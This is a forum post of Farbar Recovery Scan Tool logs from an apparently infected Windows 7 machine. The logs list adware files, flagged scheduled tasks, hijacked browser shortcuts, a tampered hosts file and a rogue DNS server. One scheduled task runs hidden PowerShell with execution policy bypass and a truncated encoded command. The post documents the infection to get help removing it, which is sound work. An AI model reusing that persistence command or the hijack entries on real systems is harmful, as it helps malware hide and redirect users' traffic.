    2016-09-18 11:37 - 2009-07-14 00:45 - 00020720 ____H C:\WINDOWS\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
    2016-09-18 11:32 - 2009-07-14 01:13 - 00790482 _____ C:\WINDOWS\system32\PerfStringBackup.INI
    2016-09-18 11:32 - 2009-07-13 23:20 - 00000000 ____D C:\WINDOWS\inf
    2016-09-18 11:28 - 2016-06-22 14:50 - 00001096 __RSH C:\ProgramData\ntuser.pol
    2016-09-18 11:27 - 2009-07-14 01:08 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
    2016-09-18 10:24 - 2016-01-21 17:57 - 00000000 ____D C:\Users\Administrator\AppData\Local\ElevatedDiagnostics
    2016-09-18 10:24 - 2009-07-13 23:20 - 00000000 ____D C:\WINDOWS\system32\NDF
    2016-09-18 07:44 - 2016-06-22 14:52 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\vlc
    2016-09-17 15:57 - 2016-01-21 15:50 - 00000000 ____D C:\Frank
    2016-09-17 15:11 - 2016-06-20 18:06 - 00000000 ____D C:\0000 decripted
    2016-09-16 21:45 - 2016-01-29 18:52 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
    2016-09-16 21:44 - 2016-01-29 18:50 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
    2016-09-16 21:25 - 2016-06-22 14:51 - 00000000 ____D C:\Users\Administrator\AppData\Local\Chromium
    2016-09-16 21:25 - 2009-07-13 23:20 - 00000000 ____D C:\Program Files\Common Files\Microsoft Shared
    2016-09-16 21:14 - 2009-07-14 00:45 - 00438496 _____ C:\WINDOWS\system32\FNTCACHE.DAT
    2016-09-16 19:51 - 2016-06-22 15:50 - 00000138 _____ C:\Users\Administrator\AppData\Roaming\WB.CFG
    2016-09-16 10:53 - 2016-01-21 18:08 - 00111536 _____ C:\Users\Administrator\AppData\Local\GDIPFONTCACHEV1.DAT
    2016-09-14 04:29 - 2009-07-13 23:20 - 00000000 ____D C:\WINDOWS\rescache
    2016-09-14 00:03 - 2016-01-29 17:35 - 00794036 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI
    2016-09-13 17:22 - 2016-01-29 20:30 - 00000000 ____D C:\WINDOWS\system32\appraiser
    2016-09-13 17:22 - 2016-01-21 15:55 - 00000000 ____D C:\Program Files\SUPERAntiSpyware

    ==================== Files in the root of some directories =======

    2016-09-18 08:03 - 2016-09-18 08:04 - 7090176 _____ () C:\Users\Administrator\AppData\Roaming\agent.dat
    2016-09-18 08:03 - 2016-09-18 08:04 - 0054272 _____ () C:\Users\Administrator\AppData\Roaming\ApplicationHosting.dat
    2016-09-18 08:04 - 2016-09-18 08:04 - 2279413 _____ () C:\Users\Administrator\AppData\Roaming\Betastock.bin
    2016-09-18 08:03 - 2016-09-18 08:04 - 0070704 _____ () C:\Users\Administrator\AppData\Roaming\Config.xml
    2016-09-18 08:03 - 2016-09-18 08:01 - 2148864 _____ () C:\Users\Administrator\AppData\Roaming\Freshdinfind.exe
    2016-09-18 08:03 - 2016-09-18 08:03 - 1903938 _____ () C:\Users\Administrator\AppData\Roaming\Freshdinfind.tst
    2016-09-18 08:01 - 2016-09-18 08:03 - 0018528 _____ () C:\Users\Administrator\AppData\Roaming\InstallationConfiguration.xml
    2016-09-18 08:01 - 2016-09-18 08:01 - 0140288 _____ () C:\Users\Administrator\AppData\Roaming\Installer.dat
    2016-09-18 08:03 - 2016-09-18 08:01 - 2148864 _____ () C:\Users\Administrator\AppData\Roaming\Koncom.exe
    2016-09-18 08:03 - 2016-09-18 08:03 - 0072823 _____ () C:\Users\Administrator\AppData\Roaming\Koncom.tst
    2016-09-18 08:04 - 2016-09-18 08:03 - 2148864 _____ () C:\Users\Administrator\AppData\Roaming\Labin.exe
    2016-09-18 08:04 - 2016-09-18 08:04 - 0072823 _____ () C:\Users\Administrator\AppData\Roaming\Labin.tst
    2016-09-18 08:03 - 2016-09-18 08:04 - 0126464 _____ () C:\Users\Administrator\AppData\Roaming\lobby.dat
    2016-09-18 08:03 - 2016-09-18 08:04 - 0018432 _____ () C:\Users\Administrator\AppData\Roaming\Main.dat
    2016-09-18 08:03 - 2016-09-18 08:04 - 0005568 _____ () C:\Users\Administrator\AppData\Roaming\md.xml
    2016-09-18 08:04 - 2016-09-18 08:04 - 2279413 _____ () C:\Users\Administrator\AppData\Roaming\MedJob.bin
    2016-09-18 08:03 - 2016-09-18 08:04 - 0126464 _____ () C:\Users\Administrator\AppData\Roaming\noah.dat
    2016-09-18 08:12 - 2016-09-18 11:14 - 0000053 _____ () C:\Users\Administrator\AppData\Roaming\st
    2016-09-18 08:04 - 2016-09-18 08:03 - 2148864 _____ () C:\Users\Administrator\AppData\Roaming\Tipair.exe
    2016-09-18 08:04 - 2016-09-18 08:04 - 1903938 _____ () C:\Users\Administrator\AppData\Roaming\Tipair.tst
    2016-09-18 08:03 - 2016-09-18 08:03 - 2148864 _____ () C:\Users\Administrator\AppData\Roaming\Triodom.exe
    2016-09-18 08:03 - 2016-09-18 08:03 - 1903938 _____ () C:\Users\Administrator\AppData\Roaming\Triodom.tst
    2016-09-18 08:04 - 2016-09-18 08:04 - 2279413 _____ () C:\Users\Administrator\AppData\Roaming\True-Top.bin
    2016-09-18 08:04 - 2016-09-18 08:05 - 0001150 _____ () C:\Users\Administrator\AppData\Roaming\uninstall_temp.ico
    2016-09-18 08:03 - 2016-09-18 08:03 - 2148864 _____ () C:\Users\Administrator\AppData\Roaming\VillaStattom.exe
    2016-09-18 08:03 - 2016-09-18 08:03 - 0072823 _____ () C:\Users\Administrator\AppData\Roaming\VillaStattom.tst
    2016-06-22 15:50 - 2016-09-16 19:51 - 0000138 _____ () C:\Users\Administrator\AppData\Roaming\WB.CFG
    2016-09-18 07:59 - 2016-09-18 07:59 - 0895488 _____ () C:\Users\Administrator\AppData\Local\misgua.dll
    2016-09-18 07:59 - 2016-09-18 07:59 - 0002560 _____ () C:\Users\Administrator\AppData\Local\uninstallssl.exe
    2016-09-18 07:58 - 2016-09-18 07:58 - 0441344 _____ () C:\ProgramData\smp2.exe

    Files to move or delete:
    ====================
    C:\Users\Administrator\AppData\Local\misgua.dll
    C:\Users\Administrator\AppData\Local\Temp\00006210\casrss.exe
    C:\ProgramData\smp2.exe


    Some files in TEMP:
    ====================

    C:\Users\Administrator\AppData\Local\Temp\FFFE.tmp.exe
    C:\Users\Administrator\AppData\Local\Temp\FFFF.tmp.exe
    C:\Users\Administrator\AppData\Local\Temp\fsd88F.exe
    C:\Users\Administrator\AppData\Local\Temp\GMXVRMA49M.exe
    C:\Users\Administrator\AppData\Local\Temp\HEANY4DXIP.exe
    C:\Users\Administrator\AppData\Local\Temp\IED4GWN5X5.exe
    C:\Users\Administrator\AppData\Local\Temp\IKCJH8XGY5.exe
    C:\Users\Administrator\AppData\Local\Temp\KFT2N0ATDM.exe
    C:\Users\Administrator\AppData\Local\Temp\KFTK2DSOJV.exe
    C:\Users\Administrator\AppData\Local\Temp\ludashisetup.exe
    C:\Users\Administrator\AppData\Local\Temp\LZNRZYLAR6.exe
    C:\Users\Administrator\AppData\Local\Temp\nsbB9D5.tmp.exe
    C:\Users\Administrator\AppData\Local\Temp\NSGGCKCSHQ.exe
    C:\Users\Administrator\AppData\Local\Temp\nsh8129.tmp.exe
    C:\Users\Administrator\AppData\Local\Temp\nsr2E87.tmp.exe
    C:\Users\Administrator\AppData\Local\Temp\OHZ9X79HC4.exe
    C:\Users\Administrator\AppData\Local\Temp\Setup.exe
    C:\Users\Administrator\AppData\Local\Temp\Setup_2048.exe
    C:\Users\Administrator\AppData\Local\Temp\UJXZFXYRJW.exe
    C:\Users\Administrator\AppData\Local\Temp\Uninstall.exe
    C:\Users\Administrator\AppData\Local\Temp\V3HV993T15.exe
    C:\Users\Administrator\AppData\Local\Temp\Y3YEWJT7RI.exe


    ==================== Bamital & volsnap =================

    (There is no automatic fix for files that do not pass verification.)

    C:\WINDOWS\system32\winlogon.exe => File is digitally signed
    C:\WINDOWS\system32\wininit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\wininit.exe => File is digitally signed
    C:\WINDOWS\explorer.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
    C:\WINDOWS\system32\svchost.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
    C:\WINDOWS\system32\services.exe => File is digitally signed
    C:\WINDOWS\system32\User32.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
    C:\WINDOWS\system32\userinit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
    C:\WINDOWS\system32\rpcss.dll => File is digitally signed
    C:\WINDOWS\system32\dnsapi.dll
    [2016-01-23 16:42] - [2016-01-23 16:42] - 0357888 ____A (Microsoft Corporation) D20C6CE262144127DB58445A41F9A3C4

    C:\WINDOWS\SysWOW64\dnsapi.dll
    [2016-01-23 16:42] - [2016-01-23 16:42] - 0270336 ____A (Microsoft Corporation) 38A1293D686C2BF6CFFF292A0F30F025

    C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


    LastRegBack: 2016-09-13 17:53

    ==================== End of FRST.txt ============================
     
  2. photiost

    photiost Established Techie7 Member

    Additional scan result of Farbar Recovery Scan Tool (x64) Version: 17-09-2016
    Ran by Administrator (18-09-2016 11:58:32)
    Running from C:\Users\Administrator\Downloads
    Windows 7 Professional Service Pack 1 (X64) (2016-01-21 22:09:17)
    Boot Mode: Normal
    ==========================================================


    ==================== Accounts: =============================

    Administrator (S-1-5-21-1896049756-2371463424-3974721238-500 - Administrator - Enabled) => C:\Users\Administrator
    Guest (S-1-5-21-1896049756-2371463424-3974721238-501 - Limited - Disabled)
    HomeGroupUser$ (S-1-5-21-1896049756-2371463424-3974721238-1002 - Limited - Enabled)

    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

    ==================== Installed Programs ======================

    (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.1211.101.114 - ALPS ELECTRIC CO., LTD.)
    DriverUpdate (HKLM-x32\...\DriverUpdate) (Version: 2.7.0 - Slimware Utilities Holdings, Inc.)
    DriverUpdate (x32 Version: 2.7.0 - Slimware Utilities Holdings, Inc.) Hidden
    Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
    Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 16.0.7167.2060 - Microsoft Corporation)
    Microsoft OneDrive (HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\OneDriveSetup.exe) (Version: 17.3.4604.0120 - Microsoft Corporation)
    Microsoft SharePoint Designer 2010 (HKLM-x32\...\Office14.SharePointDesigner) (Version: 14.0.7015.1000 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
    Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
    Mozilla Firefox 48.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 48.0.2 (x86 en-US)) (Version: 48.0.2 - Mozilla)
    Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 48.0.2 - Mozilla)
    Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7167.2060 - Microsoft Corporation) Hidden
    Office 16 Click-to-Run Licensing Component (Version: 16.0.7167.2060 - Microsoft Corporation) Hidden
    Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7167.2060 - Microsoft Corporation) Hidden
    SafeFinder (HKLM-x32\...\{05019CFB-8FF6-4F88-8E9E-CF5E6A1AA38D}) (Version: 1.0.0.0 - Linkury) <==== ATTENTION
    SafeFinder (HKLM-x32\...\{1E1BF6F8-9785-45A5-9821-DF846308BE9F}) (Version: 1.0.0.0 - Linkury) <==== ATTENTION
    Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0017-0000-0000-0000000FF1CE}_Office14.SharePointDesigner_{8B883A57-E4BC-4745-8E6C-68168850F9DD}) (Version: - Microsoft)
    Setup (HKLM-x32\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version: - ) <==== ATTENTION
    Stellarium 0.14.2 (HKLM\...\Stellarium_is1) (Version: 0.14.2 - Stellarium team)
    SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1210 - SUPERAntiSpyware.com)
    Virtual Moon Atlas V6.0 (HKLM-x32\...\{3EB7A19B-690F-49BA-B494-CADA547D0DB9}_is1) (Version: - )
    VLC media player 2.1.3 (HKLM-x32\...\VLC media player) (Version: 2.1.3 - VideoLAN)

    ==================== Custom CLSID (Whitelisted): ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== Scheduled Tasks (Whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    Task: {11B0901B-7817-4D91-9457-0870BE557C0A} - System32\Tasks\ttwifi => C:\Program Files (x86)\ttwifi\tiantianwifi.exe <==== ATTENTION
    Task: {11E0260B-A1B3-4C76-92FB-E4E45BBE5BA6} - System32\Tasks\SystemHealer Run Delay => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
    Task: {163555F5-F8D6-41B9-9D58-3329BA276E77} - System32\Tasks\SMW_P => C:\ProgramData\smp2.exe [2016-09-18] () <==== ATTENTION
    Task: {23BF22F9-DEAB-43A2-8A94-5B101AB4E2E2} - System32\Tasks\{78047A47-0C79-0578-0A11-0C7F0F7A117D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgADsAOwA7ACAAIAA7ADsAOwAgADsAIAAgACAAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUA (the data entry has 9964 more characters). <==== ATTENTION
    Task: {28B31CF2-C3A5-410B-B28E-D3F477BBCC56} - System32\Tasks\{AC769F71-F24C-4982-9CD9-2399739747D0} => pcalua.exe -a "C:\Program Files (x86)\DPower\uninstaller.exe"
    Task: {33AA5276-F186-4F36-B614-FACEF7D12B73} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
    Task: {36A38FF0-FEA6-494C-8169-A84D4B5D4DB4} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-09-05] (Microsoft Corporation)
    Task: {4CE1D488-D903-4335-9AB7-3830BECDF912} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2016-09-13] (Microsoft Corporation)
    Task: {4DFEE54D-5A75-4674-9599-2CF0C1235984} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe <==== ATTENTION
    Task: {4F4D22B5-7496-4CF9-9984-12320C3EEE6C} - System32\Tasks\nerta => C:\Program Files (x86)\Stlr\nerta\nerta.exe [2016-09-02] () <==== ATTENTION
    Task: {5AECB8E6-6A1D-4416-A94E-63AB73367CB3} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
    Task: {60C8E917-F7DE-40EC-90E1-52930F5A35CB} - System32\Tasks\ByteFence => C:\Program Files\ByteFence\ByteFence.exe <==== ATTENTION
    Task: {77873BFF-B00B-4058-AEDC-951CEC91E632} - System32\Tasks\DriverUpdate Startup => C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe
    Task: {796A0AB1-3CEB-43A6-9673-AADD6332FCD0} - System32\Tasks\KuaiZip_Update => X86\Update.exe <==== ATTENTION
    Task: {7D4B7411-CA39-485E-885F-EAF4DF6F2E71} - System32\Tasks\e02c4bd5-54d5-4470-9ea0-a68d88112c00 => C:\Users\Administrator\AppData\Roaming\QuickCleaner\QuickCleanerCSUS.exe [2016-09-18] ()
    Task: {883EEFB8-329D-423A-BDA8-47E47587BF1A} - System32\Tasks\DriverUpdate Scan => C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe
    Task: {9CF158C5-EBBF-4534-947A-C011B643E9A5} - System32\Tasks\System Healer Task => C:\PROGRA~2\SYSTEM~1\RESCUE~1.EXE <==== ATTENTION
    Task: {9FCD7E48-DD58-48DC-A2A7-68FB2FA6851C} - System32\Tasks\{5E89D5D4-C91B-4F37-AF11-F0CBE417CCC0} => pcalua.exe -a "C:\Program Files (x86)\mpck\uninstaller.exe"
    Task: {B4C9453B-5317-4006-9B25-BD4D32EE1256} - System32\Tasks\bvyvcvd => C:\Users\Administrator\AppData\Local\bvyvcvd\bvyvcvd.exe [2016-08-18] () <==== ATTENTION
    Task: {C30D90A2-350E-4FF9-9A31-334654945EDC} - System32\Tasks\ComputerZ-Tray => C:\Program Files (x86)\LuDaShi\ComputerZTray.exe <==== ATTENTION
    Task: {DF4D7109-8481-4C9A-9A89-CCB4B0D65A9A} - System32\Tasks\{E2E7A15A-991B-470C-85A5-CFECBCB02080} => pcalua.exe -a "C:\Program Files (x86)\Common Files\Softcof\uninstall.exe" -c shuz -f "C:\Program Files (x86)\Common Files\Softcof\uninstall.dat" -a uninstallme 1E1BF6F8-9785-45A5-9821-DF846308BE9F DeviceId=0a614ed4-c345-6988-f199-5cfd8209aae9 BarcodeId=51199006 ChannelId=6 DistributerName=APSF3GInstall
    Task: {E1E3A202-90D0-4A01-B8ED-D72D63271822} - System32\Tasks\{9CBDDEFC-08B0-4505-B272-4C0259D93CAD} => pcalua.exe -a "C:\Program Files (x86)\EasyHotspot\uninstaller.exe"
    Task: {EBD0F564-06A8-4CFE-8FF2-6C151538BA74} - System32\Tasks\PC SpeedUp Service Deactivator => C:\Program Files (x86)\PC Speed Up\PCSUSD.exe <==== ATTENTION
    Task: {EF0EA095-08F7-440A-B2BC-E59A63BEFDC8} - System32\Tasks\ByteFence Scan => C:\Program Files\ByteFence\ByteFence.exe <==== ATTENTION
    Task: {F3953AC7-982F-4CE5-A383-C09887DBEA40} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-09-05] (Microsoft Corporation)
    Task: {F3A5846C-8CA4-4CEF-8D20-35484B32105D} - System32\Tasks\Pritc => C:\Users\Administrator\AppData\Local\Temp\00006210\casrss.exe [2016-09-18] (VLOME) <==== ATTENTION
    Task: {F41BB250-CA8B-4B02-9687-31435C3A2E46} - System32\Tasks\{C7D820FC-CDAB-40D6-BEDE-D25C4C86FE7F} => pcalua.exe -a "C:\Program Files (x86)\Common Files\K-Fax\uninstall.exe" -c shuz -f "C:\Program Files (x86)\Common Files\K-Fax\uninstall.dat" -a uninstallme 05019CFB-8FF6-4F88-8E9E-CF5E6A1AA38D DeviceId=0a614ed4-c345-6988-f199-5cfd8209aae9 BarcodeId=51199006 ChannelId=6 DistributerName=APSF3GInstall
    Task: {FCB44360-EB78-42FD-BC6D-BBA436723783} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2016-09-13] (Microsoft Corporation)

    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

    Task: C:\WINDOWS\Tasks\DriverUpdate Scan.job => C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe
    Task: C:\WINDOWS\Tasks\DriverUpdate Startup.job => C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe
    Task: C:\WINDOWS\Tasks\PC SpeedUp Service Deactivator.job => C:\Program Files (x86)\PC Speed Up\PCSUSD.exe <==== ATTENTION
    Task: C:\WINDOWS\Tasks\System HealerPeriod.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
    Task: C:\WINDOWS\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION

    ==================== Shortcuts =============================

    (The entries could be listed to be restored or removed.)

    WMI_ActiveScriptEventConsumer_ASEC: <===== ATTENTION

    ShortcutWithArgument: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://navsmart.info
    ShortcutWithArgument: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epf&s=g9izftpbl0cshmoau,488cdb43-66e8-4d85-9ddc-52057119e93e,
    ShortcutWithArgument: C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://navsmart.info
    ShortcutWithArgument: C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://navsmart.info
    ShortcutWithArgument: C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://navsmart.info
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://navsmart.info
    ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://navsmart.info

    ==================== Loaded Modules (Whitelisted) ==============

    2016-09-18 08:04 - 2016-05-15 18:04 - 02089472 _____ () C:\ProgramData\Logic Handler\set.exe
    2016-09-18 08:03 - 2016-09-18 08:01 - 02148864 _____ () C:\ProgramData\CloudPrinter\CloudPrinter.exe
    2016-08-16 04:00 - 2016-08-16 04:00 - 00012288 _____ () C:\Program Files (x86)\Stlr\nerta\nertacs.exe
    2016-05-19 10:41 - 2016-05-19 10:41 - 00134656 _____ () C:\Users\Administrator\AppData\Local\Apps\2.0\abril.exe
    2016-09-18 08:03 - 2016-09-18 08:03 - 02148864 _____ () C:\ProgramData\Ronzap\Ronzap.exe
    2016-09-18 07:57 - 2016-09-18 07:57 - 00423936 _____ () C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\knskAF7C.tmpfs
    2015-12-26 04:59 - 2015-12-26 04:59 - 00158720 _____ () C:\Users\Administrator\AppData\Local\4C4C4544-1474185518-5810-8038-B3C04F425431\qnsaF06.tmp
    2014-08-04 14:04 - 2012-11-08 21:55 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
    2016-09-02 17:10 - 2016-09-02 17:10 - 00033280 _____ () C:\Program Files (x86)\Stlr\nerta\nerta.exe
    2016-09-18 07:59 - 2016-09-18 07:59 - 00895488 _____ () C:\Users\Administrator\AppData\Local\misgua.dll
    2016-09-18 08:04 - 2016-09-18 08:04 - 00248320 _____ () C:\ProgramData\Ronzap\IndigoString.dll
    2016-02-23 15:47 - 2016-09-05 09:09 - 08921792 _____ () C:\Program Files (x86)\Microsoft Office\root\Office16\1033\GrooveIntlResource.dll

    ==================== Alternate Data Streams (Whitelisted) =========

    (If an entry is included in the fixlist, only the ADS will be removed.)


    ==================== Safe Mode (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\bsdpf64.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\bsdpr64.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\bsdpf64.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\bsdpr64.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

    ==================== Association (Whitelisted) ===============

    (If an entry is included in the fixlist, the registry item will be restored to default or removed.)


    ==================== Internet Explorer trusted/restricted ===============

    (If an entry is included in the fixlist, it will be removed from the registry.)

    IE trusted site: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\localhost -> localhost
    IE trusted site: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\webcompanion.com -> hxxp://webcompanion.com
    IE restricted site: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\bet365.com -> hxxp://www.bet365.com
    IE restricted site: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\onclicktop.com -> hxxp://www.onclicktop.com
    IE restricted site: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\pdn-2.com -> hxxp://xml.pdn-2.com
    IE restricted site: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\targetctracker.com -> hxxp://n.targetctracker.com

    ==================== Hosts content: ==========================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2009-07-13 22:34 - 2016-09-18 08:49 - 00003554 ____A C:\WINDOWS\system32\Drivers\etc\hosts

    107.178.255.88 www.google-analytics.com
    107.178.255.88 www.statcounter.com
    107.178.255.88 statcounter.com
    107.178.255.88 ssl.google-analytics.com
    107.178.255.88 partner.googleadservices.com
    107.178.255.88 google-analytics.com
    107.178.248.130 static.doubleclick.net
    107.178.247.130 connect.facebook.net
    107.178.255.88 www.google-analytics.com
    107.178.255.88 www.statcounter.com
    107.178.255.88 statcounter.com
    107.178.255.88 ssl.google-analytics.com
    107.178.255.88 partner.googleadservices.com
    107.178.255.88 google-analytics.com
    107.178.248.130 static.doubleclick.net
    107.178.247.130 connect.facebook.net0.0.0.0 0.0.0.0 # fix for traceroute and netstat display anomaly
    0.0.0.0 tracking.opencandy.com.s3.amazonaws.com
    0.0.0.0 media.opencandy.com
    0.0.0.0 cdn.opencandy.com
    0.0.0.0 tracking.opencandy.com
    0.0.0.0 api.opencandy.com
    0.0.0.0 api.recommendedsw.com
    0.0.0.0 installer.betterinstaller.com
    0.0.0.0 installer.filebulldog.com
    0.0.0.0 d3oxtn1x3b8d7i.cloudfront.net
    0.0.0.0 inno.bisrv.com
    0.0.0.0 nsis.bisrv.com
    0.0.0.0 cdn.file2desktop.com
    0.0.0.0 cdn.goateastcach.us
    0.0.0.0 cdn.guttastatdk.us

    There are 43 more lines.


    ==================== Other Areas ============================

    (Currently there is no automatic fix for this section.)

    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Control Panel\Desktop\\Wallpaper -> C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
    DNS Servers: 104.197.191.4
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
    Windows Firewall is enabled.

    ==================== MSCONFIG/TASK MANAGER disabled items ==

    (Currently there is no automatic fix for this section.)


    ==================== FirewallRules (Whitelisted) ===============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
    FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
    FirewallRules: [{7EBE8246-AF94-4134-9889-F67B7C69D295}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
    FirewallRules: [{ED60FE75-E654-4E16-AFB4-97456ACE0E74}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
    FirewallRules: [{633FDB78-A966-45DA-94AF-8E7E07A00E52}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
    FirewallRules: [{B7DF2D4A-249C-4EE4-89BB-1E011DA75A62}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
